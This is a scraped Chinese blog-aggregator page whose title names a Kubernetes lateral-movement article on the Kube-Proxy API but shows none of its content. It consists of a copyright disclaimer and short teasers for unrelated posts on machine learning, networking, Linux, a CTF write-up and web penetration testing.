Lateral Movement - Threat Matrix for Kubernetes

Taking a look at the Kube-Proxy API

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2278976.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

人物一致性训练测评数据集

人物一致性训练测评数据集

1.Pulid 训练:由1.5M张从互联网收集的高质量人类图像组成,图像标题由blip2自动生成。 测试:从互联网上收集了一个多样化的肖像测试集,该数据集涵盖了多种肤色、年龄和性别,共计120张图像,我们称之为DivID-120,作为补充资源,还使用了最近开源的测试集Unsplash-50,包含…
阅读更多...
【深度学习实战】kaggle 自动驾驶的假场景分类

【深度学习实战】kaggle 自动驾驶的假场景分类

本次分享我在kaggle中参与竞赛的历程&#xff0c;这个版本是我的第一版&#xff0c;使用的是vgg。欢迎大家进行建议和交流。 概述 判断自动驾驶场景是真是假&#xff0c;训练神经网络或使用任何算法来分类驾驶场景的图像是真实的还是虚假的。 图像采用 RGB 格式并以 JPEG 格式…
阅读更多...
网络编程 | UDP套接字通信及编程实现经验教程

网络编程 | UDP套接字通信及编程实现经验教程

1、UDP基础 传输层主要应用的协议模型有两种&#xff0c;一种是TCP协议&#xff0c;另外一种则是UDP协议。在上一篇博客文章中&#xff0c;已经对TCP协议及如何编程实现进行了详细的梳理讲解&#xff0c;在本文中&#xff0c;主要讲解与TCP一样广泛使用了另一种协议&#xff1a…
阅读更多...
【Linux】线程全解:概念、操作、互斥与同步机制、线程池实现

【Linux】线程全解:概念、操作、互斥与同步机制、线程池实现

&#x1f3ac; 个人主页&#xff1a;谁在夜里看海. &#x1f4d6; 个人专栏&#xff1a;《C系列》《Linux系列》《算法系列》 ⛰️ 道阻且长&#xff0c;行则将至 目录 &#x1f4da;一、线程概念 &#x1f4d6; 回顾进程 &#x1f4d6; 引入线程 &#x1f4d6; 总结 &a…
阅读更多...
掌握未来:从零开始学习生成式AI大模型!

掌握未来:从零开始学习生成式AI大模型!

随着人工智能技术的飞速发展&#xff0c;生成式AI大模型已成为当今科技领域的热点。从文本生成、图像创作到音乐创作&#xff0c;生成式AI大模型在各个领域展现出惊人的潜力。本文将带领大家从零开始&#xff0c;逐步学习生成式AI大模型&#xff0c;掌握未来的关键技术。 一、生…
阅读更多...
多肽合成 -- 液相合成(liquid-phase peptide synthesis (LPPS))

多肽合成 -- 液相合成(liquid-phase peptide synthesis (LPPS))

液相合成的定义 液相合成&#xff08;Solution Synthesis&#xff09;是指在液体介质中进行的化学合成反应&#xff0c;是化学合成中一种基本且重要的方法。它涉及到将反应物溶解在溶剂中&#xff0c;在一定的温度、压力和其他反应条件下进行化学反应&#xff0c;从而生成所需的…
阅读更多...
第23篇 基于ARM A9处理器用汇编语言实现中断<五>

第23篇 基于ARM A9处理器用汇编语言实现中断<五>

Q&#xff1a;怎样修改HPS Timer 0定时器产生的中断周期&#xff1f; A&#xff1a;在上一期实验的基础上&#xff0c;可以修改按键中断服务程序&#xff0c;实现红色LED上的计数值递增的速率&#xff0c;主程序和其余代码文件不用修改。 实现以下功能&#xff1a;按下KEY0…
阅读更多...
ChatGPT大模型极简应用开发-CH1-初识 GPT-4 和 ChatGPT

ChatGPT大模型极简应用开发-CH1-初识 GPT-4 和 ChatGPT

文章目录 1.1 LLM 概述1.1.1 语言模型和NLP基础1.1.2 Transformer及在LLM中的作用1.1.3 解密 GPT 模型的标记化和预测步骤 1.2 GPT 模型简史&#xff1a;从 GPT-1 到 GPT-41.2.1 GPT11.2.2 GPT21.2.3 GPT-31.2.4 从 GPT-3 到 InstructGPT1.2.5 GPT-3.5、Codex 和 ChatGPT1.2.6 …
阅读更多...
2025春秋杯冬季赛 day1 crypto

2025春秋杯冬季赛 day1 crypto

文章目录 通往哈希的旅程小哈斯RSA1ez_rsa 通往哈希的旅程 根据提示推断是哈希函数&#xff0c;ai一下&#xff0c;推测大概率是一个sha1&#xff0c;让ai写一个爆破脚本即可 import hashlib# 给定目标 SHA-1 哈希值 target_hash "ca12fd8250972ec363a16593356abb1f3cf…
阅读更多...
广播网络实验

广播网络实验

1 实验内容 1、构建星性拓扑下的广播网络,实现hub各端口的数据广播,验证网络的连通性并测试网络效率 2、构建环形拓扑网络,验证该拓扑下结点广播会产生数据包环路 2 实验流程与结果分析 2.1 实验环境 ubuntu、mininet、xterm、wireshark、iperf 2.2 实验方案与结果分析…
阅读更多...
RustDesk ID更新脚本

RustDesk ID更新脚本

RustDesk ID更新脚本 此PowerShell脚本自动更新RustDesk ID和密码&#xff0c;并将信息安全地存储在Bitwarden中。 特点 使用以下选项更新RustDesk ID&#xff1a; 使用系统主机名生成一个随机的9位数输入自定义值 为RustDesk生成新的随机密码将RustDesk ID和密码安全地存储…
阅读更多...
JavaEE之常见的锁策略

JavaEE之常见的锁策略

前面我们学习过线程不安全问题&#xff0c;我们通过给代码加锁来解决线程不安全问题&#xff0c;在生活中我们也知道有很多种类型的锁&#xff0c;同时在代码的世界当中&#xff0c;也对应着很多类型的锁&#xff0c;今天我们对锁一探究竟&#xff01; 1. 常见的锁策略 注意: …
阅读更多...
数字图像处理:实验二

数字图像处理:实验二

任务一&#xff1a; 将不同像素&#xff08;32、64和256&#xff09;的原图像放大为像素大 小为1024*1024的图像&#xff08;图像自选&#xff09; 要求&#xff1a;1&#xff09;输出一幅图&#xff0c;该图包含六幅子图&#xff0c;第一排是原图&#xff0c;第 二排是对应放大…
阅读更多...
WEB渗透技术研究与安全防御

WEB渗透技术研究与安全防御

目录 作品简介I IntroductionII 1 网络面临的主要威胁1 1.1 技术安全1 2 分析Web渗透技术2 2.1 Web渗透技术的概念2 2.2 Web漏洞产生的原因2 2.3 注入测试3 2.3.1 注入测试的攻击流程3 2.3.2 进行一次完整的Sql注入测试4 2.3.3 Cookie注入攻击11 3 安全防御方案设计…
阅读更多...
使用 Thermal Desktop 进行航天器热分析

使用 Thermal Desktop 进行航天器热分析

介绍 将航天器保持在运行温度下的轨道上是一个具有挑战性的问题。航天器需要处理太空非常寒冷的背景温度&#xff0c;同时还要管理来自内部组件、地球反照率和太阳辐射的高热负荷。航天器在轨道上可以进行的各种轨道机动使解决这个问题变得更加复杂。 Thermal Desktop 是一款…
阅读更多...
乘联会:1月汽车零售预计175万辆 环比暴跌33.6%

乘联会:1月汽车零售预计175万辆 环比暴跌33.6%

快科技1月18日消息&#xff0c;据乘联会的初步推算&#xff0c;2025年1月狭义乘用车零售总市场规模预计将达到约175万辆左右。与去年同期相比&#xff0c;这一数据呈现了-14.6%的同比下降态势&#xff1b;而相较于上个月&#xff0c;则出现了-33.6%的环比暴跌情况。 为了更清晰…
阅读更多...
SQL 递归 ---- WITH RECURSIVE 的用法

SQL 递归 ---- WITH RECURSIVE 的用法

SQL 递归 ---- WITH RECURSIVE 的用法 开发中遇到了一个需求&#xff0c;传递一个父类id&#xff0c;获取父类的信息&#xff0c;同时获取其所有子类的信息。 首先想到的是通过程序中去递归查&#xff0c;但这种方法着实孬了一点&#xff0c;于是想&#xff0c;sql能不能递归查…
阅读更多...
【机器学习实战入门项目】使用深度学习创建您自己的表情符号

【机器学习实战入门项目】使用深度学习创建您自己的表情符号

深度学习项目入门——让你更接近数据科学的梦想 表情符号或头像是表示非语言暗示的方式。这些暗示已成为在线聊天、产品评论、品牌情感等的重要组成部分。这也促使数据科学领域越来越多的研究致力于表情驱动的故事讲述。 随着计算机视觉和深度学习的进步&#xff0c;现在可以…
阅读更多...
windows 搭建flutter环境,开发windows程序

windows 搭建flutter环境,开发windows程序

环境安装配置&#xff1a; 下载flutter sdk https://docs.flutter.dev/get-started/install/windows 下载到本地后&#xff0c;随便找个地方解压&#xff0c;然后配置下系统环境变量 编译windows程序本地需要安装vs2019或更新的开发环境 主要就这2步安装后就可以了&#xff0…
阅读更多...
【Linux】15.Linux进程概念(4)

【Linux】15.Linux进程概念(4)

文章目录 程序地址空间前景回顾C语言空间布局图&#xff1a;代码1代码2代码3代码4代码5代码6代码7 程序地址空间前景回顾 历史核心问题&#xff1a; pid_t id fork(); if(id 0) else if(id>0) 为什么一个id可以放两个值呢&#xff1f;之前没有仔细讲。 C语言空间布局图&am…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023